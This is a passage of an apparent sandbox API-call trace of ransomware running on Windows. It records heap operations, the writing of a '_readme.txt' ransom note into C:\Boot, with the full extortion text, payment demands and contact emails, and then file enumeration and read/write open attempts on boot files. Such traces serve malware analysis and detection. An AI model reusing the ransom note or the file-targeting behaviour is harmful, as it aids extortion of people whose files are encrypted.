lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.832] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.832] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.833] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.834] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.834] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.835] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.835] PathFindFileNameW (pszPath="") returned="" [0227.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.835] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.835] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.835] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.836] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.836] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0227.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.836] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.836] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0227.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.836] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.836] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.837] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.837] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.837] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.837] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0227.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.837] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0227.837] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.837] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0227.837] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.837] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0227.838] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.838] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0227.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.838] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0227.838] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.838] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0227.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.838] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0227.838] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.838] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.838] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0227.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.838] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.839] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0227.839] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edb68 | out: hHeap=0x630000) returned 1 [0227.839] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed648 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.839] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x31de170 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.839] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.839] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.839] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x31d6930 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31de170 | out: hHeap=0x630000) returned 1 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.840] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed648 | out: hHeap=0x630000) returned 1 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.840] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.840] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.840] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.841] 